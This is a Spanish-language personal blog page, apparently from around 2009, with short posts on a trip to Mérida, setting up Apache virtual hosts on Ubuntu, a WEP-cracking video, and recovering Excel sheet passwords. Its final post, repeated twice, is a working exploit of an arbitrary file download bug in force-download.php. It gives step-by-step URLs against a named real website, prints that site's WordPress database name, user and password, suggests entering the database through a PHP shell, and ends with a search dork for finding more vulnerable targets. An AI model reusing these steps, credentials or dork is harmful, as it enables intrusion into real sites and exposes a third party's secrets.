Este fin de semana que paso me escape a merida a distraerme del trabajo y demas preocupaciones que me estaban causando demaciado estres. aqui les dejo unas fotos para que vean que lindo es mi merida :p
Mi linda merida:
Servidor en Linux Ubuntu Server – ( Manual completo )
Bueno me ahorrare la parte de la instalacion ya que aqui esta
http://www.forat.info/2008/08/12/servidor-en-linux-ubuntu-server-manual-completo/
ok, ya tenemos instalado nuestro servidor pero no queremos usar el no-ip que viene en el manual y tenemos nuestro propio dominio
les mostrare muy facil como lo tengo :p,
1.- hacer una cuenta free de DNS en cdmon. ( yo lo uso)
2.-agregar el dominio y te pedira que pongas la ip del server (el tuyo claro esta )
3.- entramos a nuestro server por ssh y nos vamos a cd /etc/apache2/sites-available una vez dentro encontraremos un archivo llamado default
lo abrimos con nano: nano default. y nos arrojara lo siguiente:
ahora reiniciamos apache con /etc/init.d/apache2 restart
y ahora ya podran entrar a su servidor con su propio dominio;
si quieren agregar mas dominios solo tienen que copiar todo el desmadrito que trae el archivo default hacia abajo y cambiando :
DocumentRoot y Server Name y listo xDD
se aceptan criticas.
aclaro este texto esta escrito bajo experiencia xD investigando y bla bla bla :p
http://www.forat.info/2008/08/12/servidor-en-linux-ubuntu-server-manual-completo/
ok, ya tenemos instalado nuestro servidor pero no queremos usar el no-ip que viene en el manual y tenemos nuestro propio dominio
les mostrare muy facil como lo tengo :p,
1.- hacer una cuenta free de DNS en cdmon. ( yo lo uso)
2.-agregar el dominio y te pedira que pongas la ip del server (el tuyo claro esta )
3.- entramos a nuestro server por ssh y nos vamos a cd /etc/apache2/sites-available una vez dentro encontraremos un archivo llamado default
lo abrimos con nano: nano default. y nos arrojara lo siguiente:
NameVirtualHost *
ServerAdmin email@dominio.com
DocumentRoot /var/www/
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Order allow,deny
allow from all
ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all
ErrorLog /var/log/apache2/error.log
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
y mas......ahora agregamos ServerName www.dominio.com abajo de DocumentRoot /var/www/
quedando de la siguiente manera
DocumentRoot /var/www/
ServerName www.dominio.com
ahora reiniciamos apache con /etc/init.d/apache2 restart
y ahora ya podran entrar a su servidor con su propio dominio;
si quieren agregar mas dominios solo tienen que copiar todo el desmadrito que trae el archivo default hacia abajo y cambiando :
DocumentRoot y Server Name y listo xDD
se aceptan criticas.
aclaro este texto esta escrito bajo experiencia xD investigando y bla bla bla :p
The BlackList By Zer0 Z0org
Crackear claves wep
Bueno aca pongo un videotutorial un poco extenso de como crackear claves wep creado por Oscar Rovira.
Crackear claves wep = hackear claves de inalambricos
Crackear claves wep = hackear claves de inalambricos
EPICA - Unleashed
Bueno Aqui les traigo el Nuevo video de Epica titulado Unleashed, es una buena rola de esta banda holandesa; simone simons i love you xD hahahaha
Problemas con password en hojas de excel?

Bueno no se si algunos les ah pasado esto como a mi camarada zer0 z0orgsobre este tema aqui comenta su experiencia y soluciones :p
Bueno pues me surgio est problemin, de que olvide la pass de una hoja de excel y pues pense
mergas y ahora quien podra defenderme? xDDD y en eso aparecio el chapulin googlorado.
jaja ya pues en mi super, duper, mega busqueda vi muchos programas que "crackeaban", y "recuperaban la pass", pero todo tiene un precio en esta ciber vida, shiale que mamds no?
En fin uno que es pobre, humilde y honrado pues a segir buscando pero alguno que sea gratuito
hasta que un alma se apiado de la pobreza ajena y en un blog me encontre con un programma llamado Excel Password Recovery con keygen y regalito y toda la cosa jaja nel no cierto esta limpio.
Y lo pruebo y nada que no anda con las hojas de excel del 2007, no pues le digo ami carnal el gothic que si tiene alguna version vieja , no que si que la 2003 ya pues le digo que me role una hoja con pass y ya pues la pongo en el programin y voala "crackeo" la contrase?a que ami parecer lo que hace es modificarla pero sabra la merga xDD.
Pero la hoja que yo queria crackear o recuperar el pass era con el office 2007 asi que el problema seguia xD.
Hasta que mi carnalillo el gothic me dice y para que querias esa madre, le platico el problema y me dice pues abrelo con el open office y yo no mams y ese que pedo recupera la contrase?a o que (todo bobo yo que no sabia que era el open office xD) y ya lo bajo, lo instalo y me quedo de a 6 ya que ni siquiera pedia la pass xD.
Asi que la conclusion:
Versiones viejas: Excel Password Recovery
Descarga:
http://rapidshare.com/files/231837817/Excel_password_recovery_www.zer0-z0org.com.zip
Actual: Open Office
Descarga:
http://openoffice.bouncer.osuosl.org/?product=OpenOffice.org&os=win&lang=es&version=3.1.0
PD: Para los que tienen dinero sea suyo o ajeno, aqui pueden crackear o recuperar la pass, comprando el producto.
https://www.cleverbridge.com/
Mis pi?Aventuras xD
Saludos, Zer0 z0orG
Explotando Full Source Diclosure Bugueando "force-download.php"
Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.
simplemente tenemos la web:
http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php
http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:
http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:
/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:
require_once( dirname(__FILE__) . '/wp-load.php' );
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php
Código:
/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');
/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');
/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');
/** MySQL hostname */
define('DB_HOST', 'localhost');
y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking
dork: "allinurl: "force-download.php?file= .pdf""
simplemente tenemos la web:
http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php
http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:
http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:
/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:
require_once( dirname(__FILE__) . '/wp-load.php' );
http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php
Código:
/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');
/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');
/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');
/** MySQL hostname */
define('DB_HOST', 'localhost');
y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking
dork: "allinurl: "force-download.php?file= .pdf""
Suscribirse a:
Entradas (Atom)
